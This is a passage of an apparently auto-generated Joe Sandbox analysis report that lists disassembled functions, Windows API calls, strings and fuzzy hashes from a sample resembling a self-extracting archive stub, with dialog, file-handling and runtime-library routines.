Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2f43478df4a763fbf125b4620778848808c56edcec326fa462a54ef5301fdf16
Instruction ID: 2ebb9d5c038ba79c8624de1e075517bb94b12ed037a243f95f356c6c274eca39
Opcode Fuzzy Hash: 2f43478df4a763fbf125b4620778848808c56edcec326fa462a54ef5301fdf16
Instruction Fuzzy Hash: 56A001962A9202BD760866666DDBD3A129DD8C0B25330C9BAF52994092A8805D851079

Function 00B7F6E1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a113862e41ca28ff7498d4557cc9a79c0b559c8181e240768bc552501685565
Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
Opcode Fuzzy Hash: 8a113862e41ca28ff7498d4557cc9a79c0b559c8181e240768bc552501685565
Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539

Function 00B7F6EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 018732fa960947048a9bfc9fd8e11b53b6b9d9419898a5a6976f32b684c9e68e
Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
Opcode Fuzzy Hash: 018732fa960947048a9bfc9fd8e11b53b6b9d9419898a5a6976f32b684c9e68e
Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539

Function 00B7F6CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e60e6c680de02c1594bab70c27730ae5af98c953dfe58703219b1596d3a3dbc
Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
Opcode Fuzzy Hash: 6e60e6c680de02c1594bab70c27730ae5af98c953dfe58703219b1596d3a3dbc
Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539

Function 00B7F72E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b8371a8c8b8afb31fca6a7088795b2a605ba5d40c42fe508d6d3eebb9b0cb19
Instruction ID: f0dce188adba874971d77bc873e26860bcbd89ce0b12ed4efe2e2f503eb2b299
Opcode Fuzzy Hash: 6b8371a8c8b8afb31fca6a7088795b2a605ba5d40c42fe508d6d3eebb9b0cb19
Instruction Fuzzy Hash: 68A001962AD203BD760866666D9BD3A129DC8C4B61330C9BAF52A84092A8805D851079

Function 00B7F71A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d1ffc409b674af3b2040a5c26261b12df737e8b0b857f4566768997b8aa63b99
Instruction ID: f0dce188adba874971d77bc873e26860bcbd89ce0b12ed4efe2e2f503eb2b299
Opcode Fuzzy Hash: d1ffc409b674af3b2040a5c26261b12df737e8b0b857f4566768997b8aa63b99
Instruction Fuzzy Hash: 68A001962AD203BD760866666D9BD3A129DC8C4B61330C9BAF52A84092A8805D851079

Function 00B6B199 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00B6A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00B6922F,-00008BE0), ref: 00B6B19C

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 5b4388c82397679db57f9ff21daf35b2e8d72366043da14066d31f5cb7378b88
Instruction ID: 45f4f8e0bc0ce1cdb890b5bf81dd956d77a242c79e291702c38822a02fd8573e
Opcode Fuzzy Hash: 5b4388c82397679db57f9ff21daf35b2e8d72366043da14066d31f5cb7378b88
Instruction Fuzzy Hash: 78A0223008000E8BCE002B32EF0880C3B20FB22BC830002E8A00BCF0B2CF23882BCB00

Non-executed Functions

Function 00B7D420 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B7D4B1
EndDialog.USER32(?,00000006), ref: 00B7D4C4
GetDlgItem.USER32(?,0000006C), ref: 00B7D4E0
SetFocus.USER32(00000000), ref: 00B7D4E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00B7D521
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B7D558
FindFirstFileW.KERNEL32(?,?), ref: 00B7D56E

Part of subcall function 00B7BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC3F
Part of subcall function 00B7BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B7BC50
Part of subcall function 00B7BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7BC5E
Part of subcall function 00B7BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC6C
Part of subcall function 00B7BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7BC87
Part of subcall function 00B7BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00B7BCAE
Part of subcall function 00B7BC2B: _swprintf.LIBCMT ref: 00B7BCD4

_swprintf.LIBCMT ref: 00B7D5B7

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B7D5CA
FindClose.KERNEL32(00000000), ref: 00B7D5D1
_swprintf.LIBCMT ref: 00B7D620
SetDlgItemTextW.USER32(?,00000068,?), ref: 00B7D633
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B7D650
_swprintf.LIBCMT ref: 00B7D683
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B7D696
_swprintf.LIBCMT ref: 00B7D6E0
SetDlgItemTextW.USER32(?,00000069,?), ref: 00B7D6F3

Part of subcall function 00B7C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B7C0B9
Part of subcall function 00B7C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BA072C,?,?), ref: 00B7C108

Strings

REPLACEFILEDLG, xrefs: 00B7D447
%s %s, xrefs: 00B7D5A4, 00B7D5B0, 00B7D616, 00B7D679, 00B7D6D6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$REPLACEFILEDLG
API String ID: 3464475507-439456425
Opcode ID: e205cbc838877c14a49b8275be7ebc1803579ea89950b2cc424d5d484c93ff39
Instruction ID: 199a47c230edd5d4b3b81300587a294b21b2752abaeedecf1123dc1ea356cf15
Opcode Fuzzy Hash: e205cbc838877c14a49b8275be7ebc1803579ea89950b2cc424d5d484c93ff39
Instruction Fuzzy Hash: 6F71E272148304BBE231ABA4DC89FFB77ECEF8A740F044859F69DD2081DA75A9048762

Function 00B80A0A Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B80A16
IsDebuggerPresent.KERNEL32 ref: 00B80AE2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B80B02
UnhandledExceptionFilter.KERNEL32(?), ref: 00B80B0C

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 89430aa7418dbdb4c0cd54406a648560ab915ff51d6298bffde35c85c9d86166
Instruction ID: 95153c9a37a144f54d0640c48dd0cc77423575aa9ae43adc586b0c00cef8afa7
Opcode Fuzzy Hash: 89430aa7418dbdb4c0cd54406a648560ab915ff51d6298bffde35c85c9d86166
Instruction Fuzzy Hash: 08313A75D012199BDB20EFA4D989BCDBBF8EF08304F1041EAE408A7260EB715A85CF44

Function 00B67AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B67AB4
_wcslen.LIBCMT ref: 00B67B1D
_wcslen.LIBCMT ref: 00B67B8E

Part of subcall function 00B68704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B68713
Part of subcall function 00B68704: GetLastError.KERNEL32 ref: 00B68759
Part of subcall function 00B68704: CloseHandle.KERNEL32(?), ref: 00B68768

Part of subcall function 00B6B470: DeleteFileW.KERNELBASE(?,00000000,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B481
Part of subcall function 00B6B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B4AF

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B67C43
CloseHandle.KERNEL32(00000000), ref: 00B67C5F
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B67DAB

Part of subcall function 00B6B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B67ED0,?,?,?,00000000), ref: 00B6B04C
Part of subcall function 00B6B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B6B100

Part of subcall function 00B6A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B6A83D,?,?,?,?,?,00B9380F,000000FF), ref: 00B6A89B

Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00B67AD6
\??\, xrefs: 00B67B35
SeRestorePrivilege, xrefs: 00B67ACC
UNC\, xrefs: 00B67B5B

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: fd4aed73be76327f22f49a6dbea065f0dbfc291a4c40ca02e720918f385740f2
Instruction ID: 4d54e3bd35e629578fa4a184c45baffedfdf810b82dc88ce291406292176ad30
Opcode Fuzzy Hash: fd4aed73be76327f22f49a6dbea065f0dbfc291a4c40ca02e720918f385740f2
Instruction Fuzzy Hash: 35C1E671944205AADB21DB64CC86FEEB7ECEF04318F1445EAF545E7242DF38AA44CBA1

Function 00B6F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B6F62E

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

Part of subcall function 00B730F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA3070,?,00B6EC48,00000000,?,00000050,00BA3070), ref: 00B73112

_strlen.LIBCMT ref: 00B6F64F
SetDlgItemTextW.USER32(?,00BA0274,?), ref: 00B6F6AF
GetWindowRect.USER32(?,?), ref: 00B6F6E9
GetClientRect.USER32(?,?), ref: 00B6F6F5
GetWindowLongW.USER32(?,000000F0), ref: 00B6F795
GetWindowRect.USER32(?,?), ref: 00B6F7C2
SetWindowTextW.USER32(?,?), ref: 00B6F7FB
GetSystemMetrics.USER32(00000008), ref: 00B6F803
GetWindow.USER32(?,00000005), ref: 00B6F80E
GetWindowRect.USER32(00000000,?), ref: 00B6F83B
GetWindow.USER32(00000000,00000002), ref: 00B6F8AD

Strings

d, xrefs: 00B6F715
CAPTION, xrefs: 00B6F7DD
$%s:, xrefs: 00B6F622

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: b933f9a660fce322ea8067dfafaef825f0fbee1f736495d88f73605d7d71c548
Instruction ID: 613d6532fdb79022923cb04311ffac85b709e4d9f904165a0ba5e12ddbbc6c6f
Opcode Fuzzy Hash: b933f9a660fce322ea8067dfafaef825f0fbee1f736495d88f73605d7d71c548
Instruction Fuzzy Hash: DF819072108301AFD710DFA8DD89F6BBBE9EB89704F04096DFA84E7290D674E805CB52

Function 00B8DCE2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B8DD26

Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D8DE
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D8F0
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D902
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D914
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D926
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D938
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D94A
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D95C
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D96E
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D980
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D992
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D9A4
Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D9B6

_free.LIBCMT ref: 00B8DD1B

Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692

_free.LIBCMT ref: 00B8DD3D
_free.LIBCMT ref: 00B8DD52
_free.LIBCMT ref: 00B8DD5D
_free.LIBCMT ref: 00B8DD7F
_free.LIBCMT ref: 00B8DD92
_free.LIBCMT ref: 00B8DDA0
_free.LIBCMT ref: 00B8DDAB
_free.LIBCMT ref: 00B8DDE3
_free.LIBCMT ref: 00B8DDEA
_free.LIBCMT ref: 00B8DE07
_free.LIBCMT ref: 00B8DE1F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 88d5d99eb6c229ab041ddb897f05e87133d64fb0031583a642d2f34dce6c8e79
Instruction ID: 26fb4c0fd4e6e55764041d4784d2b4c94a4f50bb3973bc984813b93621fba471
Opcode Fuzzy Hash: 88d5d99eb6c229ab041ddb897f05e87133d64fb0031583a642d2f34dce6c8e79
Instruction Fuzzy Hash: 9C3117326043059FEB20BA38D845B5AB3E9FB11B11F1849ABE4499B1B1EF71AC80CB55

Function 00B7C7B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

EndDialog.USER32(?,00000001), ref: 00B7C800
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7C827
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B7C840
SetWindowTextW.USER32(?,?), ref: 00B7C851
GetDlgItem.USER32(?,00000065), ref: 00B7C85A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B7C86E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B7C884
SetForegroundWindow.USER32(?), ref: 00B7C88B

Strings

LICENSEDLG, xrefs: 00B7C7C4

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: MessageSend$ItemWindow$Text$DialogForeground
String ID: LICENSEDLG
API String ID: 3249366922-2177901306
Opcode ID: 45da1986a36e09798d246b621b7399a0c8c7342f6c2c0b7cf43eec69e437b616
Instruction ID: 4774b58531ae3868439b93125502a4b91061e24f64fc476acaa194343ab90b53
Opcode Fuzzy Hash: 45da1986a36e09798d246b621b7399a0c8c7342f6c2c0b7cf43eec69e437b616
Instruction Fuzzy Hash: 8621A0322402007BD2215F29EC89F3B3FECEB4AB85F04849CF654B70A1CF62A9419632

Function 00B7E7EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00B7E811
GetClassNameW.USER32(00000000,?,00000800), ref: 00B7E83D

